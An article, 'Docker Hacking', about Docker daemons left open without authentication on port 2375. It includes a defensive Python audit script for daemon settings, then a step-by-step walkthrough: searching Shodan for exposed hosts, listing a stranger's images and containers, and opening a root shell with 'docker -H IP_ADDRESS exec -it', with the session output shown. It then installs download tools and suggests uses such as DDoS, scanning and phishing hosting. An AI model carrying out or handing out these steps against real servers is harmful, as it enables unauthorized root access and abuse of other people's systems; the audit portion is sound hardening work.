DOCKER HACKING 


Since 2013, Docker has been a game changer in several IT industries: it gives both developers and users a lot of flexibility for developing and running many applications and operating systems.


Firstly, Docker containers provide isolation and portability for software applications. By encapsulating 
an application and its dependencies within a container, developers can ensure consistent behavior 
across different environments. This eliminates the notorious “works on my machine” problem and 
streamlines the deployment process. 


Secondly, Docker enables the deployment of containers in clusters, managed by frameworks like 
Google’s Kubernetes. This approach allows for the separation of application code and infrastructure, 
facilitating highly resilient and elastic architectures. Container clustering is particularly beneficial for 
microservices-based applications, as it promotes scalability and fault tolerance. 


Lastly, Docker containers offer a higher layer of abstraction for application deployment. They simplify 
the process of configuring, saving, and sharing server environments. With Docker, installing an 
application or large software can be as easy as running a few commands. This ease of use enhances 
productivity and accelerates development cycles. 


While Docker has gained significant popularity in recent years, it does introduce some complexity to the development process, and also a serious weakness if you enable remote access and keep the default settings. An attacker can then be root in a second, as we'll see below.


Remote access for Docker daemon 


If you want to work remotely on a container, it's possible to configure Docker to accept requests from a remote host, as explained on this page from the Docker documentation. Even though the documentation explains how to protect Docker, for example by creating a non-root user or by protecting the daemon socket, a lot of remotely accessible daemons run with the default configuration: accessible on port 2375 without authentication, or on port 2376 for TLS, and every command runs as root.
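The difference between the exposed default and the protected configuration can be checked mechanically on the hosts you administer. The following Python script is an added example, not code from this article or from the Docker project: it reads the "hosts" list of /etc/docker/daemon.json and the -H / --tlsverify flags on a systemd ExecStart line, and rates each listener. The two daemon.json documents and the unit file embedded in it are constructed samples; the certificate paths in the hardened sample and the severity labels are this example's own assumptions.

```python
"""Audit a Docker daemon's listener configuration for an unauthenticated remote
API endpoint (the port-2375 misconfiguration discussed above).  Added example,
not code from the original article or the Docker project; the sample
daemon.json and systemd unit texts below are constructed for this example."""

import json
import shlex
from dataclasses import dataclass
from typing import List

LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


@dataclass
class Finding:
    source: str      # where the listener was declared (daemon.json or unit file)
    listener: str    # the host string exactly as written
    severity: str    # "critical", "warning" or "ok" (labels chosen for this example)
    reason: str


def classify_listener(listener: str, tls_verify: bool, source: str) -> Finding:
    """Rate one dockerd -H / "hosts" entry. A TCP listener reachable from other
    machines without --tlsverify hands root-equivalent control to any client."""
    scheme, _, rest = listener.partition("://")
    if scheme in ("unix", "fd", "npipe"):
        return Finding(source, listener, "ok",
                       "local socket; access limited by file permissions / the docker group")
    if scheme != "tcp":
        return Finding(source, listener, "warning", f"unrecognised listener scheme {scheme!r}")
    if rest.startswith("["):                       # bracketed IPv6 literal, e.g. [::]:2376
        host, _, port = rest[1:].partition("]")
        port = port.lstrip(":")
    else:
        host, _, port = rest.partition(":")
    port = port or ("2376" if tls_verify else "2375")   # dockerd's own defaults
    if host in LOOPBACK_HOSTS or host.startswith("127."):
        return Finding(source, listener, "warning",
                       f"TCP API on loopback port {port}: not remote, but any local process "
                       "can drive the daemon without authentication")
    where = host or "all interfaces"
    if not tls_verify:
        return Finding(source, listener, "critical",
                       f"remote API on {where}:{port} without tlsverify: unauthenticated root access")
    return Finding(source, listener, "ok",
                   f"remote API on {where}:{port} requires a client certificate signed by the CA")


def audit_daemon_json(text: str) -> List[Finding]:
    """Audit the "hosts" list of a daemon.json document passed as text."""
    cfg = json.loads(text)
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = [classify_listener(h, tls_verify, "daemon.json") for h in cfg.get("hosts", [])]
    missing = [k for k in ("tlscacert", "tlscert", "tlskey") if tls_verify and k not in cfg]
    if missing:
        findings.append(Finding("daemon.json", "tlsverify", "warning",
                                "tlsverify set but missing " + ", ".join(missing)))
    return findings


def audit_systemd_unit(text: str) -> List[Finding]:
    """Audit -H/--host and --tlsverify flags on the ExecStart= line of a dockerd unit."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("ExecStart="):
            continue
        argv = shlex.split(line[len("ExecStart="):])
        hosts: List[str] = []
        tls_verify = False
        i = 0
        while i < len(argv):
            arg = argv[i]
            if arg in ("-H", "--host") and i + 1 < len(argv):
                hosts.append(argv[i + 1])
                i += 1
            elif arg.startswith("--host="):
                hosts.append(arg.split("=", 1)[1])
            elif arg.startswith("-H") and len(arg) > 2:     # -Htcp://... form
                hosts.append(arg[2:])
            elif arg == "--tlsverify":
                tls_verify = True
            elif arg.startswith("--tlsverify="):
                tls_verify = arg.split("=", 1)[1].lower() == "true"
            i += 1
        findings.extend(classify_listener(h, tls_verify, "systemd ExecStart") for h in hosts)
    return findings


def worst_severity(findings: List[Finding]) -> str:
    order = {"critical": 2, "warning": 1, "ok": 0}
    return max((f.severity for f in findings), key=order.get, default="ok")


# Constructed samples: the exposed default, and a hardened equivalent following
# the daemon-socket protection page of the Docker docs (paths are assumed).
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"})
WEAK_UNIT = ("[Service]\nExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 "
             "--containerd=/run/containerd/containerd.sock\n")

if __name__ == "__main__":
    for label, found in (("weak daemon.json", audit_daemon_json(WEAK_DAEMON_JSON)),
                         ("hardened daemon.json", audit_daemon_json(HARDENED_DAEMON_JSON)),
                         ("weak unit file", audit_systemd_unit(WEAK_UNIT))):
        print(f"== {label}: {worst_severity(found)}")
        for f in found:
            print(f"  [{f.severity}] {f.listener}: {f.reason}")
```

Run it against a copy of /etc/docker/daemon.json and the dockerd unit file (systemctl cat docker) from the host you are auditing; a "critical" listener is exactly the configuration the Shodan search in the next section turns up. dockerd refuses to start when hosts are given both in daemon.json and as an -H flag, so a given host normally declares its listeners in only one of the two places.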


Find these containers on Shodan 


By searching for product:docker port:2375 on Shodan, we can see many servers hosting containers with port 2375 open.

Because Shodan's free accounts provide limited results (2 pages), you can increase the number of available results by filtering on different countries in turn, adding country=XX where XX is the country code: "country=US" for USA, "country=UK" for United Kingdom, "country=CN" for China, etc. Complete list

Analyse the server before attacking (Optional)


When you use Docker remotely, you can use the usual options listed on this page. The difference is that you need to specify the host with the "-H" parameter. We will first check the Docker version installed by using the "--version" option on the first server listed on Shodan in the previous section. Then we can list all images installed and available with the "images" parameter.


docker -H IP_ADDRESS --version
Docker version 20.10.25+dfsg1, build b82b9f3

docker -H IP_ADDRESS images
REPOSITORY   TAG                  IMAGE ID     CREATED
ubuntu       latest               <redacted>   4 weeks ago
nginx        stable-alpine-perl   <redacted>   5 weeks ago
alpine       latest               <redacted>   5 weeks ago
ubuntu       18.04                <redacted>   3 months ago


Launch the attack 


To list every process actually running, you will use the "ps" parameter. You can see the operating system running in each container, its uptime, size, and especially its container ID (the CONTAINER ID column), which we will use.


docker -H IP_ADDRESS ps
CONTAINER ID   IMAGE                      COMMAND                    CREATED        PORTS                                    NAMES
2a8762d702ad   ubuntu:18.04               "/bin/bash"                2 hours ago                                             adroit_oxter
<redacted>     ubuntu:18.04               "/bin/bash"                12 hours ago                                            adroit_obelus
<redacted>     ubuntu:18.04               "/bin/bash"                12 hours ago                                            boorish_peristeronic
<redacted>     ubuntu:18.04               "/bin/bash"                42 hours ago                                            risible_hirquiticke
<redacted>     ubuntu:18.04               "/bin/bash"                2 days ago                                              verdant_peristeronic
<redacted>     ubuntu                     "/bin/bash -c 'apt-g..."   2 days ago                                              distracted_einstein
<redacted>     nginx:stable-alpine-perl   "/docker-entrypoint..."    4 days ago     :::8000->8000/tcp                        tools-web-nginx3-1
<redacted>     nginx:stable-alpine-perl   "/docker-entrypoint..."    4 days ago     0.0.0.0:443->443/tcp, :::443->443/tcp   tools-ssl2-nginx-1


Let's try the first one, running Ubuntu. After docker -H IP_ADDRESS, we select a container with the "exec" parameter, add the "-it" options for an interactive shell ("i" for interactive and "t" for tty), then give the container ID. Finally, we write the command we want to run in this container, here "/bin/bash".
docker -H IP_ADDRESS exec -it 2a8762d702ad /bin/bash
root@2a8762d702ad:/# whoami
root
root@2a8762d702ad:/# uname -a
Linux 2a8762d702ad 5.4.6-78-generic #78-Ubuntu SMP Fri Mar 19 13:29:52 UTC 2021 x8
root@2a8762d702ad:/#


After a few seconds, we are root. No credentials, no confirmation, nothing. Just:


“Hello that’s me! 
-OK, please come and do whatever you want”. 


Now, maybe you'll need more tools. To install them, you'll probably need wget, curl or git. On this container, curl is not available; you can install it with: apt install curl -y


root@2a8762d702ad:/# curl
bash: curl: command not found
root@2a8762d702ad:/# apt install curl -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  curl
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 159 kB of archives.
After this operation, 398 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 curl amd64 7.58.
2% [1 curl 4652 B/159 kB 3%]


Same for wget: apt install wget -y 


root@2a8762d702ad:/# wget
bash: wget: command not found
root@2a8762d702ad:/# apt install wget -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  wget
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 316 kB of archives.
After this operation, 954 kB of additional disk space will be used.
Get:1 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 wget amd64 1.19.1
The git command is already available on this container. If it is not available, you can install it with: apt install git -y


root@2a8762d702ad:/# git -h
unknown option: -h

usage: git [--version] [--help] [-C <path>] [-c <name>=<value>]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p | --paginate | --no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

root@2a8762d702ad:/#


You can now imagine what a malicious attacker can do with all of this: launching a DDoS attack from this container, anonymously scanning any sensitive server and coming back later to download the results, hosting a phishing or clickjacking web page, etc.


If your Docker containers are remotely accessible, please check the security section in the official 
documentation and make it secure: https://docs.docker.com/engine/security/ 